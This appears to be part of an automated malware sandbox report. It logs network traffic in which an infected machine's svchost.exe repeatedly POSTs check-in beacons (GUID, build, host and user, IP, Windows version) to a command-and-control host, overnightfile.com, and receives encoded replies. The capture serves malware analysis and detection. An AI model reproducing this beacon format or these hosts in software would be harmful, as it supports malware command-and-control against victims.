                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:26.754947901 CEST832INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 51 4a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTQJGARRABw==0
Jul 14, 2020 11:21:27.062346935 CEST  833  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:27.157646894 CEST  833  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGYBTARRABw==0
Jul 14, 2020 11:21:27.488862038 CEST  833  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:27.577548027 CEST  834  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cABYZARRABw==0
Jul 14, 2020 11:21:27.893368006 CEST  834  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:27.983858109 CEST  834  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBZAYARRABw==0
Jul 14, 2020 11:21:28.332865953 CEST  835  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:28.423402071 CEST  835  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZQJAARRABw==0
Jul 14, 2020 11:21:29.189496994 CEST  835  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:29.278027058 CEST  836  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBNMYARRABw==0
Jul 14, 2020 11:21:29.990784883 CEST  836  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:30.078178883 CEST  836  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFFUUARRABw==0
Jul 14, 2020 11:21:30.420001984 CEST  837  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:30.511107922 CEST  837  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTZAGARRABw==0
Jul 14, 2020 11:21:30.873801947 CEST  838  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:30.966468096 CEST  838  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4b 42 59 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cKBYPARRABw==0
Jul 14, 2020 11:21:31.279530048 CEST  838  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:31.368153095 CEST  839  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cAMNZARRABw==0
Jul 14, 2020 11:21:31.696048021 CEST  839  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:31.784147024 CEST  839  IN  HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQNMJARRABw==0
Jul 14, 2020 11:21:32.233062029 CEST  840  OUT  POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:32.324143887 CEST840INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:31 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:33.262674093 CEST840OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:33.351138115 CEST841INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:32 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMGTNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:34.116233110 CEST841OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:34.205272913 CEST842INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:33 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCVEXARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:34.797559023 CEST842OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:34.885416031 CEST842INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:34 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4b 50 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGKPTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:35.510005951 CEST843OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:35.601284981 CEST843INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:35 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMTGNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:35.949476004 CEST843OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.043642998 CEST844INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:35 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMBYNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:36.396820068 CEST844OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.487154007 CEST844INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:36 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 47 54 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKGTPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:36.786541939 CEST845OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.879302025 CEST845INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:36 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJHSQARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.1.102 | 49708 | 91.218.231.226 | 80 | C:\Windows\SysWOW64\svchost.exe
Timestamp | kBytes transferred | Direction | Data
Jul 14, 2020 11:20:40.204413891 CEST | 571 | OUT | POST /mlu/forum.php HTTP/1.0
Host: overnightfile.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 191
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
